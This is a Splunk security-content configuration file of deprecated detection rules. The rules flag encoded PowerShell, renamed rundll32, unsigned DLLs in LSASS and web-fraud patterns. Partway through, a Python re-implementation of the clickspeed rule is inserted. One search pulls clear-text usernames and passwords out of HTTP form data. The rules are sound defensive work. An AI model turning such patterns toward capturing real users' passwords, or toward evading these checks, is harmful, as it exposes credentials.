Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search looks for files created with names that have been linked to malicious activity. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for files created with names that have been linked to malicious activity. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file system reads and writes. In addition, this search leverages an included lookup file that contains the names of the files to watch for, as well as a note to communicate why that file name is being monitored. This lookup file can be edited to add or remove file the file names you want to monitor. action.escu.known_false_positives = It's possible for a legitimate file to be created with the same name as one noted in the lookup file. Filenames listed in the lookup file should be unique enough that collisions are rare. Looking at the location of the file and the process responsible for the activity can help determine whether or not the activity is legitimate. 
action.escu.creation_date = 2019-04-25 action.escu.modification_date = 2019-04-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious File Write - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hidden Cobra Malware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious File Write - Rule action.correlationsearch.annotations = {"analytic_story": ["Hidden Cobra Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Filesystem.action) as action values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Filesystem)` | `suspicious_writes` | `suspicious_file_write_filter` [ESCU - Suspicious Powershell Command-Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. 
This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. Deprecated because almost the same as Malicious PowerShell Process - Encoded Command action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. Deprecated because almost the same as Malicious PowerShell Process - Encoded Command action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = Legitimate process can have this combination of command-line options, but it's not common. action.escu.creation_date = 2021-01-19 action.escu.modification_date = 2021-01-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Powershell Command-Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "CISA AA22-320A"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious Powershell Command-Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "CISA AA22-320A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. 
Deprecated because almost the same as Malicious PowerShell Process - Encoded Command action.notable.param.rule_title = Suspicious Powershell Command-Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| search (process=*-EncodedCommand* OR process=*-enc*) process=*-Exec* | `suspicious_powershell_command_line_arguments_filter` [ESCU - Suspicious Rundll32 Rename - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic identifies renamed instances of rundll32.exe executing. rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, validate it is the legitimate rundll32.exe executing and what script content it is loading. This query relies on the original filename or internal name from the PE meta data. Expand the query as needed by looking for specific command line arguments outlined in other analytics. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1036", "T1218.011", "T1036.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic identifies renamed instances of rundll32.exe executing. rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, validate it is the legitimate rundll32.exe executing and what script content it is loading. This query relies on the original filename or internal name from the PE meta data. Expand the query as needed by looking for specific command line arguments outlined in other analytics. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of rundll32, triggering a false positive. 
action.escu.creation_date = 2022-04-07 action.escu.modification_date = 2022-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Rundll32 Rename - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Masquerading - Rename System Utilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious Rundll32 Rename - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Masquerading - Rename System Utilities"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1036", "T1218.011", "T1036.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=RUNDLL32.exe AND Processes.process_name!=rundll32.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_rename_filter` [ESCU - Suspicious writes to System Volume Information - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been 
marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search detects writes to the 'System Volume Information' folder by something other than the System process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects writes to the 'System Volume Information' folder by something other than the System process. action.escu.how_to_implement = You need to be ingesting logs with both the process name and command-line from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = It is possible that other utilities or system processes may legitimately write to this folder. Investigate and modify the search to include exceptions as appropriate. 
action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious writes to System Volume Information - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Collection and Staging"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious writes to System Volume Information - Rule action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = (`sysmon` OR tag=process) EventCode=11 process_id!=4 file_path=*System\ Volume\ Information* | stats count min(_time) as firstTime max(_time) as lastTime by dest, Image, file_path | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_writes_to_system_volume_information_filter` [ESCU - Uncommon Processes On Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for applications on the endpoint that you have marked as uncommon. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for applications on the endpoint that you have marked as uncommon. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = None identified action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Uncommon Processes On Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Privilege Escalation", "Unusual Processes", "Hermetic Wiper"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Uncommon Processes On Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Privilege Escalation", "Unusual Processes", "Hermetic Wiper"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process Processes.process_name | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `uncommon_processes` |`uncommon_processes_on_endpoint_filter` [ESCU - Unsigned Image Loaded by LSASS - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. 
If you have any questions feel free to email us at: research@splunk.com. This search detects loading of unsigned images by LSASS. Deprecated because too noisy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search detects loading of unsigned images by LSASS. Deprecated because too noisy. action.escu.how_to_implement = This search needs Sysmon logs collected with a Sysmon configuration that includes EventCode 7 (image loaded) for lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Other tools could load images into LSASS for legitimate reasons, but enterprise tools should always use signed DLLs. 
action.escu.creation_date = 2019-12-06 action.escu.modification_date = 2019-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Unsigned Image Loaded by LSASS - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Credential Dumping"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Unsigned Image Loaded by LSASS - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects loading of unsigned images by LSASS. Deprecated because too noisy. 
action.notable.param.rule_title = Unsigned Image Loaded by LSASS action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=7 Image=*lsass.exe Signed=false | stats count min(_time) as firstTime max(_time) as lastTime by dest, Image, ImageLoaded, Signed, SHA1 | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `unsigned_image_loaded_by_lsass_filter` [ESCU - Unsuccessful Netbackup backups - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search gives you the hosts where a backup was attempted and then failed. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search gives you the hosts where a backup was attempted and then failed. action.escu.how_to_implement = To successfully implement this search you need to obtain data from your backup solution, either from the backup logs on your endpoints or from a central server responsible for performing the backups. If you do not use Netbackup, you can modify this search for your specific backup solution. 
action.escu.known_false_positives = None identified action.escu.creation_date = 2017-09-12 action.escu.modification_date = 2017-09-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Unsuccessful Netbackup backups - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Monitor Backup Solution"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Unsuccessful Netbackup backups - Rule action.correlationsearch.annotations = {"analytic_story": ["Monitor Backup Solution"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `netbackup` | stats latest(_time) as latestTime by COMPUTERNAME, MESSAGE | search MESSAGE="An error occurred, failed to backup." | `security_content_ctime(latestTime)` | rename COMPUTERNAME as dest, MESSAGE as signature | table latestTime, dest, signature | `unsuccessful_netbackup_backups_filter` [ESCU - Web Fraud - Account Harvesting - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to identify the creation of multiple user accounts using the same email domain name. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is used to identify the creation of multiple user accounts using the same email domain name. action.escu.how_to_implement = We start with a dataset that provides visibility into the email address used for the account creation. In this example, we are narrowing our search down to the single web page that hosts the Magento2 e-commerce platform (via URI) used for account creation, the single HTTP content-type to grab only the user's clicks, and the HTTP field that provides the username (form_data), for performance reasons. After we have the username and email domain, we look for numerous account creations per email domain. Common data sources used for this detection are customized Apache logs or Splunk Stream. action.escu.known_false_positives = As is common with many fraud-related searches, we are usually looking to attribute risk or synthesize relevant context with loosely written detections that simply detect anomalous behavior. This search will need to be customized to fit your environment; improve its fidelity by counting based on something much more specific, such as a device ID that may be present in your dataset. Whether the large number of registrations is occurring from a first-seen domain may also be important. Extending the search window to look further back in time, or even calculating the average per hour/day for each email domain to look for anomalous spikes, will improve this search. You can also use Shannon entropy or Levenshtein Distance (both courtesy of URL Toolbox) to consider the randomness or similarity of the email name or email domain, as the names are often machine-generated. 
action.escu.creation_date = 2018-10-08 action.escu.modification_date = 2018-10-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Web Fraud - Account Harvesting - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Web Fraud Detection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Web Fraud - Account Harvesting - Rule action.correlationsearch.annotations = {"analytic_story": ["Web Fraud Detection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is used to identify the creation of multiple user accounts using the same email domain name. 
action.notable.param.rule_title = Web Fraud - Account Harvesting action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `stream_http` http_content_type=text* uri="/magento2/customer/account/loginPost/" | rex field=cookie "form_key=(?<session_id>\w+)" | rex field=form_data "login\[username\]=(?<Username>[^&|^$]+)" | search Username=* | rex field=Username "@(?<email_domain>.*)" | stats dc(Username) as UniqueUsernames list(Username) as src_user by email_domain | where UniqueUsernames > 25 | `web_fraud___account_harvesting_filter` [ESCU - Web Fraud - Anomalous User Clickspeed - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to examine web sessions to identify those where the clicks are occurring too quickly for a human or are occurring with a near-perfect cadence (high periodicity or low standard deviation), resembling a script-driven session. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is used to examine web sessions to identify those where the clicks are occurring too quickly for a human or are occurring with a near-perfect cadence (high periodicity or low standard deviation), resembling a script-driven session. action.escu.how_to_implement = Start with a dataset that allows you to see clickstream data for each user click on the website. That data must have a time stamp and must contain a reference to the session identifier being used by the website. 
This ties the clicks together into clickstreams. This value is usually found in the HTTP cookie. With a bit of tuning, a version of this search could be used in high-volume scenarios, such as scraping, crawling, application DDoS, credit-card testing, account takeover, etc. Common data sources used for this detection are customized Apache logs, customized IIS, and Splunk Stream. action.escu.known_false_positives = As is common with many fraud-related searches, we are usually looking to attribute risk or synthesize relevant context with loosely written detections that simply detect anomalous behavior. action.escu.creation_date = 2018-10-08 action.escu.modification_date = 2018-10-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Web Fraud - Anomalous User Clickspeed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Web Fraud Detection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Web Fraud - Anomalous User Clickspeed - Rule action.correlationsearch.annotations = {"analytic_story": ["Web Fraud Detection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `stream_http` http_content_type=text* | rex field=cookie 
"form_key=(?<session_id>\w+)" | streamstats window=2 current=1 range(_time) as TimeDelta by session_id | where TimeDelta>0 | stats count stdev(TimeDelta) as ClickSpeedStdDev avg(TimeDelta) as ClickSpeedAvg by session_id | where count>5 AND (ClickSpeedStdDev<.5 OR ClickSpeedAvg<.5) | `web_fraud___anomalous_user_clickspeed_filter` [ESCU - Web Fraud - Password Sharing Across Accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to identify user accounts that share a common password. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is used to identify user accounts that share a common password. action.escu.how_to_implement = We need to start with a dataset that allows us to see the values of usernames and passwords that users are submitting to the website hosting the Magento2 e-commerce platform (commonly found in the HTTP form_data field). A tokenized or hashed value of a password is acceptable and certainly preferable to a clear-text password. Common data sources used for this detection are customized Apache logs, customized IIS, and Splunk Stream. action.escu.known_false_positives = As is common with many fraud-related searches, we are usually looking to attribute risk or synthesize relevant context with loosely written detections that simply detect anomalous behavior. 
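The Web Fraud - Anomalous User Clickspeed search above is easiest to reason about outside Splunk. The Python below is an added example, not ESCU content: it re-implements the streamstats/stats/where pipeline over a constructed clickstream so the thresholds can be checked offline, and makes explicit two details the SPL leaves implicit. The first click of every session (and any click whose timestamp equals the previous one) is dropped by `where TimeDelta>0`, so `count` is one less than the number of clicks, and Splunk's `stdev` is the sample standard deviation. Session names and timestamps are constructed.

```python
"""Added example (not ESCU code): the ESCU 'Web Fraud - Anomalous User Clickspeed'
logic re-implemented in Python over a constructed clickstream, so the
streamstats/stats/where semantics can be checked offline."""
from collections import defaultdict
from statistics import mean, stdev

# Constructed sample clickstream as (epoch seconds, session_id); not real traffic.
#   bot-a  clicks every 0.2 s                  -> ClickSpeedAvg < .5
#   bot-b  clicks every ~2 s with 10 ms jitter -> ClickSpeedStdDev < .5
#   human  clicks at irregular multi-second gaps
#   short  is scripted but has too few clicks to pass count>5
SAMPLE_CLICKS = (
    [(1000.0 + 0.2 * i, "bot-a") for i in range(8)]
    + [(2000.0 + 2.0 * i + 0.01 * (i % 2), "bot-b") for i in range(8)]
    + [(3000.0, "human"), (3003.7, "human"), (3011.2, "human"), (3012.9, "human"),
       (3020.4, "human"), (3031.0, "human"), (3033.3, "human")]
    + [(4000.0 + 0.1 * i, "short") for i in range(4)]
)


def click_deltas(events):
    """`streamstats window=2 current=1 range(_time) as TimeDelta by session_id | where TimeDelta>0`:
    per session, the gap from each click to the previous one.  The first click of a session
    has range 0 (window of one event) and is dropped, as is any click whose timestamp equals
    the previous one, so count is at most clicks-1."""
    last_seen = {}
    deltas = defaultdict(list)
    for ts, session in sorted(events):          # streamstats walks events in time order
        if session in last_seen:
            delta = ts - last_seen[session]
            if delta > 0:
                deltas[session].append(delta)
        last_seen[session] = ts
    return dict(deltas)


def session_stats(events):
    """`stats count stdev(TimeDelta) as ClickSpeedStdDev avg(TimeDelta) as ClickSpeedAvg by session_id`.
    Splunk's stdev is the sample standard deviation, hence statistics.stdev; a session with a
    single delta has no stdev (None here, null in Splunk) and so can never satisfy <.5."""
    stats = {}
    for session, deltas in click_deltas(events).items():
        stats[session] = {
            "count": len(deltas),
            "ClickSpeedStdDev": stdev(deltas) if len(deltas) > 1 else None,
            "ClickSpeedAvg": mean(deltas),
        }
    return stats


def anomalous_sessions(events, min_count=5, threshold=0.5):
    """`where count>5 AND (ClickSpeedStdDev<.5 OR ClickSpeedAvg<.5)`; returns sorted session_ids."""
    flagged = []
    for session, s in session_stats(events).items():
        too_regular = s["ClickSpeedStdDev"] is not None and s["ClickSpeedStdDev"] < threshold
        too_fast = s["ClickSpeedAvg"] < threshold
        if s["count"] > min_count and (too_regular or too_fast):
            flagged.append(session)
    return sorted(flagged)


if __name__ == "__main__":
    for session, s in sorted(session_stats(SAMPLE_CLICKS).items()):
        sd = "null" if s["ClickSpeedStdDev"] is None else f"{s['ClickSpeedStdDev']:.3f}"
        print(f"{session:6} count={s['count']} stdev={sd} avg={s['ClickSpeedAvg']:.3f}")
    print("flagged:", anomalous_sessions(SAMPLE_CLICKS))
```

Running it flags only bot-a and bot-b; the human session has six deltas but a standard deviation of several seconds, and the scripted "short" session is skipped by the `count>5` guard even though its average is 0.1 s, which is the knob to lower when tuning for the high-volume scenarios the how_to_implement text mentions.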
action.escu.creation_date = 2018-10-08 action.escu.modification_date = 2018-10-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Web Fraud - Password Sharing Across Accounts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Web Fraud Detection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Web Fraud - Password Sharing Across Accounts - Rule action.correlationsearch.annotations = {"analytic_story": ["Web Fraud Detection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `stream_http` http_content_type=text* uri=/magento2/customer/account/loginPost* | rex field=form_data "login\[username\]=(?<Username>[^&|^$]+)" | rex field=form_data "login\[password\]=(?<Password>[^&|^$]+)" | stats dc(Username) as UniqueUsernames values(Username) as user list(src_ip) as src_ip by Password | where UniqueUsernames>5 | `web_fraud___password_sharing_across_accounts_filter` [ESCU - Windows connhost exe started forcefully - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If 